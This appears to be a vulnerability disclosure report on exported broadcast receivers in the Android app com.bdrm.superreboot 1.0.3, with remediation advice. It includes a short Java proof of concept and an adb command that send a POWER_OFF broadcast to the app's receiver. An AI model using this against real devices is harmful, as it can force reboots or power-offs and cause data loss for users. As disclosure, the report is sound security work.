Skip to content

Latest commit

 

History

History
77 lines (53 loc) · 2.54 KB

CWE-925.md

File metadata and controls

77 lines (53 loc) · 2.54 KB

Vulnerability Assessment Report


Summary

The Android application com.bdrm.superreboot, version 1.0.3, exposes several critical actions through its exported broadcast receivers. These exposed actions can potentially allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include system reboot, entering recovery mode, power off, and more.


Details

  • Application: com.bdrm.superreboot
  • Version: 1.0.3
  • Vulnerable Component: Exposed broadcast receivers, particularly PowerOffWidgetReceiver
  • Nature of Vulnerability: Unauthorized broadcast to exported receivers
  • CWE: CWE-927: Use of Implicit Intent for Sensitive Communication; CWE-925: Improper Verification of Intent by Broadcast Receiver

Proof of Concept (PoC)

Android Java PoC:

import android.content.Intent;
import android.content.Context;

public class MaliciousBroadcastSender {

    public static void main(String[] args) {
        triggerExposedAction("POWER_OFF");
    }

    private static void triggerExposedAction(String action) {
        Context context = getApplicationContext();
        Intent intent = new Intent();
        intent.setAction(action);
        context.sendBroadcast(intent);
    }
}

ADB Usage PoC:

adb shell am broadcast -a POWER_OFF -n com.bdrm.superreboot/.PowerOffWidgetReceiver

Available Actions and Their Potential Impact:

Given the exposed actions, a malicious app can:

  • Reboot the device without user consent
  • Force the device into recovery, bootloader, or download mode
  • Power off the device
  • Restart essential system processes
  • Boot the device into safe mode

These actions can have significant consequences including unexpected behaviors, data loss, or rendering the device temporarily unusable.


Recommendations

  1. Set android:exported="false" if there's no need for other apps to send broadcasts to the receivers.
  2. Implement permissions using android:permission attribute to protect the broadcast receivers.
  3. Always verify the sender of the broadcast within the onReceive() method.
  4. Avoid exposing critical system-level functionalities that can be triggered externally without adequate authorization checks.

References